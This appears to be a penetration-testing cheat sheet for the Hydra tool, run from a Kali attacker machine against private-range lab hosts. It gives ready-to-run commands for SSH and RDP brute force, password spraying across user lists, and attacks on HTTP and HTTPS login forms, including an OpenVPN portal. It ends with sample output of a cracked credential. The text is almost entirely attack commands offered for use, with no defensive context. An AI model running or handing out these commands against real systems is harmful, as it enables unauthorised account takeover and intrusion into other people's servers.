đź§   HYDRA (FAST SERVICE BRUTE FORCE)
đźŽŻ RUN ON: Kali (attacker machine)
đź”Ą SSH BRUTE FORCE
hydra -l root -P passwords.txt ssh://172.25.170.X
đź§  Meaning:
-l root â†’ single username
-P passwords.txt â†’ password list
ssh:// â†’ target service
đź”Ą MULTI-USER SPRAY
hydra -L users.txt -P passwords.txt ssh://172.25.170.X
đź”Ą RDP BRUTE FORCE
hydra -L users.txt -P passwords.txt rdp://172.25.170.X
đź”Ą HTTP LOGIN FORM
hydra -L users.txt -P passwords.txt 172.25.170.X http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"

hydra -L Usernames.txt -p test 172.25.120.2 -s 943 https-post-form "/__auth__:username=^USER^&password=^PASS^:Login Failed" -S -vV -t 1  (openVPN)
    
đź§  OUTPUT (IMPORTANT)
[22][ssh] host: 172.25.170.X login: admin password: password123

đź‘‰ VALID CREDENTIAL FOUND
